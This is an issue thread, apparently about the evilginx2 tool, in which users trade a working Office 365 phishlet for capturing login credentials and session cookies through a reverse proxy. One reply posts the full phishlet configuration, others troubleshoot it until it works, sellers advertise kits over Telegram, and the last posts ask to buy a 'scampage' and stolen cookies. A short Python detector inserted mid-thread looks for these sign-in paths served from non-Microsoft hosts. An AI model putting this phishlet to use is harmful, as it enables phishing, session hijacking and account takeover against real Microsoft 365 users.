evilginx2
Is there a working o365 method that grabs cookies (I have tried all the suggestions).
proxy_hosts:
- {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
auth_urls:
- '/kmsi*'
Got working phishlets for o365 captures cookies, telegram me @ghoxt007
@squodgeface be careful with sending any ₿₿₿ to these guys
did you try #760?
Seems like an issue with your authentication tokens but will have to see how your o365 phishlet is coded to tell
Auth URL: kmsi should end with an asterisk
/kmsi*
also are you sure you aren't using a live.com account to test? that would give cookies under a domain evilginx isn't listening for.
I can give you the phishlet as well if it's still not capturing
Support was able to make my o365 phishlets forward results to mail and it was all on the .yaml best you work with some experience https://icq.im/mrgretzky could help fix your phishlet issue
Scammer noticed
Feel free to mark his messages. Anybody giving coins to that account deserves to lose them: "Talk to the author", spare me the laughter
working O365 phishlets captures cookies telegram me @ghoxt007
edit: see #778
Lol don't telegram me, or anybody for it: here's the o365 that captures cookies. I also have one which removes and doesn't get stuck on the long "Please wait, loading" modal, only captures the auth cookies (no regex) and has email prefill (not even saying it supports all [non o365] emails)
name: "o365" author: "@456478" min_ver: "2.3.0" proxy_hosts: - { phish_sub: "login", orig_sub: "login", domain: "microsoftonline.com", session: true, is_landing: true, auto_filter: false } - { phish_sub: "www", orig_sub: "www", domain: "office.com", session: true, is_landing: false, auto_filter: false } - { phish_sub: "acc", orig_sub: "account", domain: "microsoft.com", session: true, is_landing: false, auto_filter: false } sub_filters: - { triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "microsoftonline.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] } - { triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "microsoftonline.com", search: "https://{hostname}", replace: "https://{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript], redirect_only: true } - { triggers_on: "login.microsoftonline.com", orig_sub: "account", domain: "microsoft.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] } - { triggers_on: "login.microsoftonline.com", orig_sub: "www", domain: "office.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "text/javascript", "application/json"] } auth_tokens: - domain: ".microsoftonline.com" keys: [".*,regexp"] force_post: - path: "/ppsecure/post*" search: - { key: "LoginOptions", search: "1" } force: - { key: "DontShowAgain", value: "true" } type: "post" auth_urls: - "/kmsi*" credentials: username: key: '(login|UserName)' search: '(.*)' password: key: '(passwd|Password)' search: '(.*)' login: domain: "login.microsoftonline.com" path: "/"
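For defenders, the two sign-in paths this phishlet hooks (`/kmsi*` and `/ppsecure/post*`) are usable detection anchors: in a web-proxy log they should only ever be requested from the Microsoft domains named in this thread. The following is an added example, not part of the thread or of evilginx2; the log format (`timestamp user method url`), the user names and the non-Microsoft hostnames are constructed assumptions.

```python
from fnmatch import fnmatchcase
from urllib.parse import urlsplit

# Domains and paths as they appear in the phishlet and replies in this thread.
LEGIT_DOMAINS = ("microsoftonline.com", "office.com", "microsoft.com", "live.com")
SIGNIN_PATHS = ("/kmsi*", "/ppsecure/post*")

# Constructed sample proxy log: "timestamp user method url" (assumed format).
SAMPLE_LOG = """\
2024-01-01T10:00:00Z alice POST https://login.microsoftonline.com/kmsi
2024-01-01T10:01:00Z bob POST https://login.example-phish.test/kmsi
2024-01-01T10:02:00Z carol POST https://login.microsoftonline.com.example.test/ppsecure/post.srf?x=1
2024-01-01T10:03:00Z dave GET https://www.example.test/index.html
malformed line
""".splitlines()


def is_legit_host(host):
    """True only for a listed domain or a real subdomain of one."""
    host = host.lower().rstrip(".")
    # Suffix match on ".domain" so that lookalikes such as
    # login.microsoftonline.com.example.test do not pass.
    return any(host == d or host.endswith("." + d) for d in LEGIT_DOMAINS)


def suspicious_requests(log_lines):
    """Return (user, host, path) for sign-in paths served by a non-listed host."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 4:
            continue  # skip malformed records rather than failing the run
        _ts, user, _method, url = parts[:4]
        u = urlsplit(url)
        host = u.hostname or ""
        if not host:
            continue
        on_signin_path = any(fnmatchcase(u.path.lower(), p) for p in SIGNIN_PATHS)
        if on_signin_path and not is_legit_host(host):
            hits.append((user, host, u.path))
    return hits


if __name__ == "__main__":
    for user, host, path in suspicious_requests(SAMPLE_LOG):
        print(f"possible reverse-proxy phishing: user={user} host={host} path={path}")
```
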
When I open the phishlet it works, but when I click on sign in it gives me "no server found"?
I got it working, took me a few hours to figure it out, so pretty sure anyone else can get it working :)
I've been battling with it for over hours now. What did you do?
I finally got it working. Still having troubles with adfs.
Were you able to make it work for adfs?
Can you share the scampage please? 🙏🏼
Can you please the Scampage and the cookies link again i want to buy pls
